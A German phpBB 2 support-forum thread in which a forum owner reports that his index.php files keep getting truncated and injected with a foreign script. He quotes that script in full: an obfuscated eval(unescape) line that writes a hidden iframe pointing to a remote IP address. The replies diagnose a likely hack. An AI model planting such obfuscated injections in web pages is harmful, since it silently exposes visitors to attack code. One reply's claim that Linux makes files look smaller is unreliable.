Problem "index.php" verändert sich auf dem Server

Allgemeiner Support zum phpBB 2 Board und phpBB 2 Modifikationen
Forumsregeln
Auch wenn hier der Support für phpBB 2 weiterhin aufrecht erhalten bleibt, weisen wir darauf hin, dass das phpBB 2 nicht mehr offiziell unterstützt und weiterentwickelt wird!
Antworten
baytar
Beiträge: 190
Registriert: Mo 08.Mai, 2006 20:43

Problem "index.php" verändert sich auf dem Server

Beitrag von baytar »

Hallo
ich habe ein riesiges Problem

meine index.php und admin/index.php verden auf dem server verkrüppelt.

also ich spiele eine neue index.php auf sagen wir mal mit 613 Zeilen

und irgendwann mal bekomme ich Fehler im Forum die wie folgt aussieht

Fehlermeldung ist Beispiel

Code: Alles auswählen

Parse error: parse error, unexpected $ in /var/www/web21/html/foruma/admin/index.php on line 661
und nach dem Anschauen sehe ich immer das diese 613 Zeilen sich auf z.B. 473 Zeilen verkümmert sind.

und dann sehe ich noch nachfolgend dargestellt eine script Zeile die eigentlich nicht von mir eingefügt ist.

Code: Alles auswählen

<script type="text/javascript" language="JavaScript"> eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%69%66%72%61%6D%65%20%73%72%63%3D%5C%22%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%35%30%2E%38%32%2F%6D%70%61%63%6B%2F%69%6E%64%65%78%2E%70%68%70%5C%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%73%74%79%6C%65%3D%5C%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%5C%22%3E%3C%2F%69%66%72%61%6D%65%3E%22%29%3B%0D%0A%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%22%20%22%3B"));</script>

was ist das ? woran kann das liegen ?

bitte helft mir

habe beide index.php dateien angehangen
Du hast keine ausreichende Berechtigung, um die Dateianhänge dieses Beitrags anzusehen.
Zuletzt geändert von baytar am Sa 06.Okt, 2007 14:30, insgesamt 1-mal geändert.
Benutzeravatar
Giga4000
Beiträge: 181
Registriert: Sa 26.Nov, 2005 09:19
Wohnort: Hamburg
Kontaktdaten:

Beitrag von Giga4000 »

Ich hatte mal ein ähnliches Problem: Als erstes musst du deinen Rechner unbedingt mit einem Virenscanner und Spybot - Search & Destroy überprüfen. Wenn du dann noch alle Passwörter änderst bist du wieder auf der sicheren Seite und deine Dateien bleiben so wie sie sind!
Site: www.mx-forums.de - New!
phpBB MODs: Click Here
baytar
Beiträge: 190
Registriert: Mo 08.Mai, 2006 20:43

Beitrag von baytar »

also nichts was ich machen kann,
denn ich habe keinen Root-Server

Da müsste ich wohl den Host anschreiben richtig ?
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Auf Deinem Rechner sind Virenscanner und Spybot-Suchprogramme abzuschalten, nicht auf dem Server!
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
baytar
Beiträge: 190
Registriert: Mo 08.Mai, 2006 20:43

Beitrag von baytar »

[quote="oxpus";p="77313"]Auf Deinem Rechner sind Virenscanner und Spybot-Suchprogramme abzuschalten, nicht auf dem Server![/quote]

Oxpus das Problem ist
die Dateien sind auf dem Server und irgendwann sagt mir ein user das es probleme gibt die seite nicht gezeigt wird oder mir fällt es selber auf.

Ich ersetze die Datei auf dem Server und es geht dann wieder einige Tage gut,
und irgendwann kommt der Fehler wieder.

Wenn ich dann die index.php Dateien vergleiche fällt es mir auf, daß die Datei auf dem Server viel kleiner ist als die Sicherung auf meinem Rechner.

Und jedesmal dieser script dabei

Ich denke nicht daß es mit meinem Rechner zu tun hat, oder ?
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Also daß die Dateien "scheinbar" auf dem Server kleiner sind, als auf Deinem Rechner, ist normal, wenn auf dem Server Linux und auf Deinem Rechner Windows läuft.
Linux verwaltet die Dateien anders und spart dabei meist einige Bytes Speicherplatz, so daß sie "kleiner" erscheinen als unter Windows.

Wenn allerdings die Dateien auch nach einem Herunterladen (z. B. mittels FTP-Client) verändert wurden und sich unbekannte Dateien auf dem Server wiederfinden, ist von einem Hack auszugehen.
Dann unbedingt alles erst einmal sichern und alle Passwörter ändern.
Auch hilft ein Blick in die Log-Files des Webservers, von wem was hochgeladen oder angefasst wurde.
Dort müsste sich auch die Datei wiederfinden, die Dir fremd erscheint.

Sollte es doch kein Hack sein, wäre die Frage, ob Du den XS MOD einsetzt.
Dann mal den Ordner cache/ leeren und die Einstellungen des MODs im ACP prüfen.

Daß aber der Webserver selber die Dateien ändert, ist ausgeschlossen, da er ausser lesen und ausliefern keine weiteren Dateioperationen ohne fremdes Zutun unternimmt.

Vielleicht läuft aber auch eine Backup/Restore-Routine auf dem Server, der Probleme mit den Dateien hat.
Auch das könnte eine Möglichkeit sein.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Antworten